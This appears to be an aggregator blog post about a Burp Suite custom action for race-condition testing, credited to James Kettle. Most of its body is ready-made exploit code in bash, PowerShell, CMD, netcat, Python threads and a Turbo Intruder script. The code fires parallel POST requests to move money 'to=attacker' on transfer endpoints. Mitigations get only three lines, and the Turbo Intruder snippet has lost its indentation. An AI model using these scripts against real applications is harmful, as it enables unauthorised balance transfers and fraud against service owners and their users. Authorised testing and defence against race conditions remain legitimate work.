Race Condition Custom Action for Burp Repeater

James Kettle, Director of Research at PortSwigger, has developed a custom action to test for race conditions with a single click in Burp Repeater. This tool leverages the cutting-edge single-packet attack technique, eliminating the need for tab groups.

Key Resources:

• Code Snippet: GitHub Gist
• Research Paper: Smashing the State Machine

You Should Know:

How to Install & Use the Custom Action

1. Install Extensibility Helper (Burp Extension) to load the custom script.
2. Copy the Python code from the GitHub Gist.
3. Paste into Burp’s Extender → Add → New (Python).

4. Run the action directly from Burp Repeater.

Testing Race Conditions Manually (Linux/Windows Commands)

Linux (Bash) – Parallel Requests

for i in {1..50}; do curl -X POST "http://target.com/transfer?amount=100&to=attacker" & done

Windows (PowerShell) – Race Attack

1..50 | ForEach-Object { Start-ThreadJob -ScriptBlock { Invoke-WebRequest -Uri "http://target.com/transfer?amount=100&to=attacker" -Method POST } }

Burp Suite Intruder (Turbo Intruder Alternative)

def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=10)
request = '''POST /balance/transfer HTTP/1.1
Host: vulnerable.com
Content-Length: 25

from=user&to=attacker&amount=1000'''
for i in range(20):
engine.queue(request, gate='race1')
engine.openGate('race1')
engine.complete(timeout=60)

Single-Packet Attack (Advanced Race Condition Exploit)

This technique bypasses traditional mitigations by sending multiple requests in a single TCP packet, increasing success rates.

What Undercode Say

Race conditions remain a critical vulnerability in web applications, particularly in financial transactions, account takeovers, and inventory manipulation. Automation tools like Burp’s custom action simplify exploitation, but manual testing ensures deeper validation.

Additional Commands & Tools

• Linux (netcat for low-level race testing):

  echo -e "POST /api/transfer HTTP/1.1\r\nHost: target.com\r\n\r\namount=100" | nc target.com 80 & 
  

• Windows (curl in CMD for rapid requests):

  for /L %i in (1,1,20) do curl -X POST http://target.com/transfer --data "from=victim&to=attacker&amount=100" 
  

• Python (Multi-threaded Race Testing):

  import threading
  import requests
  def race_request():
  requests.post("http://target.com/transfer", data={"amount": 100, "to": "attacker"})
  threads = [threading.Thread(target=race_request) for _ in range(20)]
  [t.start() for t in threads]
  [t.join() for t in threads]
  

Mitigation Strategies

• Use server-side locks (e.g., database row locking).
• Implement idempotency tokens in critical operations.
• Apply rate limiting on sensitive endpoints.

Expected Output:

• Successful race conditions result in duplicate transactions, unauthorized balance transfers, or privilege escalation.
• Logs should show parallel request processing with inconsistent state changes.

For deeper exploitation, refer to the full research paper.

References:

Reported By: James Kettle – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram